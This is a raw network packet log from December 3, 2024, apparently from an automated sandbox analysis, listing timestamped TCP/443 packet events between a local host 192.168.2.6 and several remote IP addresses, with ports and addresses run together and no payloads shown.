                      Dec 3, 2024 17:51:44.166297913 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.166311979 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.166352034 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.198573112 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.198594093 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.198646069 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.198673010 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.198690891 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.198717117 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.231209993 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.231236935 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.231292009 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.231304884 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.231349945 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.259241104 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.259267092 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.259334087 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.259347916 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.259392023 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.363367081 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.363394022 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.363455057 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.363466024 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.363512039 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.385922909 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.385941982 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.386004925 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.386018991 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.386077881 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.404294968 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.404313087 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.404376030 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.404386997 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.404423952 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.425328016 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.425348043 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.425410986 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.425421953 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.425458908 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.441035986 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.441092014 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.441133022 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.441512108 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.441529989 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.771506071 CET4434976613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:44.772618055 CET49766443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:44.772680998 CET4434976613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:44.773108959 CET49766443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:44.773124933 CET4434976613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:44.825090885 CET4434976320.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:44.825231075 CET49763443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:44.827100992 CET49763443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:44.827106953 CET4434976320.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:44.827222109 CET4434976413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:44.827351093 CET4434976320.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:44.827835083 CET49764443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:44.827893972 CET4434976413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:44.828311920 CET49764443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:44.828326941 CET4434976413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:44.830270052 CET4434976513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:44.833813906 CET49763443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:44.833897114 CET49763443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:44.833900928 CET4434976320.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:44.834043026 CET49763443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:44.834410906 CET49765443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:44.834440947 CET4434976513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:44.836605072 CET49765443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:44.836608887 CET4434976513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:44.879331112 CET4434976320.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:45.105833054 CET4434976713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.106343031 CET49767443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.106375933 CET4434976713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.106810093 CET49767443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.106813908 CET4434976713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.247492075 CET4434976613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.247566938 CET4434976613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.247824907 CET49766443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.247865915 CET49766443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.247865915 CET49766443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.247888088 CET4434976613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.247898102 CET4434976613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.250972033 CET49769443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.251003981 CET4434976913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.251099110 CET49769443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.251269102 CET49769443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.251280069 CET4434976913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.326680899 CET4434976413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.326736927 CET4434976413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.326807022 CET49764443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.327043056 CET49764443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.327043056 CET49764443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.327069998 CET4434976413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.327085972 CET4434976413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.329938889 CET49770443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.329967976 CET4434977013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.330049038 CET49770443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.330209017 CET49770443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.330218077 CET4434977013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.330655098 CET4434976513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.330705881 CET4434976513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.330826998 CET49765443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.330847025 CET49765443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.330858946 CET4434976513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.330867052 CET49765443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.330872059 CET4434976513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.332756042 CET49771443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.332773924 CET4434977113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.332854986 CET49771443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.332992077 CET49771443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.333002090 CET4434977113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.364445925 CET4434976813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.365000963 CET49768443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.365014076 CET4434976813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.365431070 CET49768443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.365434885 CET4434976813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.543574095 CET4434976320.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:45.543642044 CET4434976320.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:45.543735027 CET49763443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:45.543924093 CET49763443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:45.543936014 CET4434976320.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:45.553550005 CET4434976713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.553602934 CET4434976713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.553658009 CET49767443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.553915024 CET49767443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.553925991 CET4434976713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.553934097 CET49767443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.553936958 CET4434976713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.556868076 CET49772443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.556911945 CET4434977213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.556986094 CET49772443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.557379961 CET49772443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.557395935 CET4434977213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.840298891 CET4434976813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.840389013 CET4434976813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.840507984 CET49768443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.857409954 CET49768443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.857422113 CET4434976813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.857455015 CET49768443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.857460022 CET4434976813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.961277962 CET49773443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.961311102 CET4434977313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.963062048 CET49773443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.977569103 CET49773443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:45.977580070 CET4434977313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:45.982510090 CET49774443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:45.982549906 CET4434977420.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:45.983053923 CET49774443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:45.983640909 CET49774443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:45.983658075 CET4434977420.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:47.114646912 CET4434977113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.115422010 CET49771443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.115442038 CET4434977113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.116096973 CET49771443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.116102934 CET4434977113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.151555061 CET4434976913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.152077913 CET49769443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.152098894 CET4434976913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.152529955 CET49769443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.152534008 CET4434976913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.226799965 CET4434977013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.227405071 CET49770443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.227418900 CET4434977013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.227881908 CET49770443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.227885962 CET4434977013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.385499001 CET4434977213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.386106968 CET49772443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.386143923 CET4434977213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.386596918 CET49772443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.386601925 CET4434977213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.557239056 CET4434977113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.557306051 CET4434977113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.557430983 CET49771443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.557578087 CET49771443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.557599068 CET4434977113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.557610035 CET49771443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.557615042 CET4434977113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.560606956 CET49775443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.560650110 CET4434977513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.560730934 CET49775443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.560920000 CET49775443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.560933113 CET4434977513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.614167929 CET4434976913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.614239931 CET4434976913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.614341974 CET49769443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.614557981 CET49769443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.614571095 CET4434976913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.614581108 CET49769443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.614586115 CET4434976913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.617290020 CET49776443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.617315054 CET4434977613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.617408037 CET49776443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.617527962 CET49776443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.617539883 CET4434977613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.716979027 CET4434977013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.717044115 CET4434977013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.717200041 CET49770443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.717381001 CET49770443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.717403889 CET4434977013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.717421055 CET49770443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.717427015 CET4434977013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.720431089 CET49777443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.720465899 CET4434977713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.720566034 CET49777443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.720732927 CET49777443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.720752001 CET4434977713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.830236912 CET4434977213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.830326080 CET4434977213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.830588102 CET49772443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.830632925 CET49772443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.830632925 CET49772443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.830653906 CET4434977213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.830665112 CET4434977213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.833435059 CET49778443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.833475113 CET4434977813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.833570957 CET49778443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.833782911 CET49778443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.833792925 CET4434977813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.877274036 CET4434977313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.877914906 CET49773443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.877939939 CET4434977313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:47.878362894 CET49773443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:47.878369093 CET4434977313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:48.320560932 CET4434977420.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:48.320703983 CET49774443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:48.322762012 CET49774443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:48.322772026 CET4434977420.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:48.323043108 CET4434977420.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:48.324791908 CET49774443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:48.324853897 CET49774443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:48.324858904 CET4434977420.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:48.324984074 CET49774443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:48.325942993 CET4434977313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:48.326004028 CET4434977313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:48.326047897 CET49773443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:48.326256037 CET49773443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:48.326281071 CET4434977313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:48.326292038 CET49773443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:48.326297998 CET4434977313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:48.329021931 CET49779443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:48.329051971 CET4434977913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:48.329127073 CET49779443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:48.329262972 CET49779443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:48.329272985 CET4434977913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:48.371334076 CET4434977420.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:49.016911983 CET4434977420.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:49.017061949 CET4434977420.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:49.017141104 CET49774443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:49.017362118 CET49774443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:49.017380953 CET4434977420.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:49.321048975 CET4434977513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.321693897 CET49775443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.321727037 CET4434977513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.322309971 CET49775443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.322314978 CET4434977513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.549370050 CET4434977713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.549968004 CET49777443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.550004959 CET4434977713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.550421000 CET49777443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.550427914 CET4434977713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.577044010 CET4434977613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.577470064 CET49776443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.577502012 CET4434977613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.577878952 CET49776443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.577892065 CET4434977613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.756849051 CET4434977513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.756926060 CET4434977513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.756978989 CET49775443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.757174015 CET49775443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.757184029 CET4434977513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.757210970 CET49775443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.757215023 CET4434977513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.760440111 CET49780443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.760459900 CET4434978013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.760531902 CET49780443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.760689020 CET49780443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.760698080 CET4434978013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.808494091 CET4434977813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.808985949 CET49778443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.809012890 CET4434977813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.809423923 CET49778443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.809427977 CET4434977813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.990228891 CET4434977713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.990298033 CET4434977713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.990410089 CET49777443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.990648031 CET49777443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.990664959 CET4434977713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.993657112 CET49781443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.993726015 CET4434978113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:49.993805885 CET49781443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.993987083 CET49781443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:49.994009018 CET4434978113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.028155088 CET4434977613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.028223991 CET4434977613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.028294086 CET49776443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.028490067 CET49776443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.028496027 CET4434977613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.028512001 CET49776443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.028516054 CET4434977613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.031476974 CET49782443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.031497002 CET4434978213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.031593084 CET49782443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.031795979 CET49782443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.031802893 CET4434978213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.184655905 CET4434977913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.185086966 CET49779443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.185117960 CET4434977913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.185533047 CET49779443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.185539007 CET4434977913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.262299061 CET4434977813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.262363911 CET4434977813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.262415886 CET49778443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.262612104 CET49778443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.262624025 CET4434977813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.262638092 CET49778443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.262643099 CET4434977813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.265474081 CET49783443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.265518904 CET4434978313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.265604019 CET49783443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.265786886 CET49783443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.265799999 CET4434978313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.623034954 CET4434977913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.623105049 CET4434977913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.623197079 CET49779443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.623405933 CET49779443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.623421907 CET4434977913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.623436928 CET49779443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.623450994 CET4434977913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.626456976 CET49784443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.626486063 CET4434978413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:50.626580000 CET49784443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.626796007 CET49784443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:50.626804113 CET4434978413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:51.555480957 CET4434978013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:51.556077957 CET49780443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:51.556116104 CET4434978013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:51.556548119 CET49780443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:51.556554079 CET4434978013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:51.725565910 CET4434978113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:51.726547003 CET49781443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:51.726586103 CET4434978113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:51.726973057 CET49781443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:51.726979017 CET4434978113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:51.888653040 CET4434978213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:51.889090061 CET49782443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:51.889101028 CET4434978213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:51.889569998 CET49782443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:51.889574051 CET4434978213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:51.988877058 CET4434978313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:51.989484072 CET49783443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:51.989520073 CET4434978313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:51.989940882 CET49783443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:51.989945889 CET4434978313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:52.008630037 CET4434978013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:52.008711100 CET4434978013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:52.008773088 CET49780443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:52.008975983 CET49780443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:52.008992910 CET4434978013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:52.009005070 CET49780443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:52.009010077 CET4434978013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:52.012008905 CET49785443192.168.2.613.107.246.63
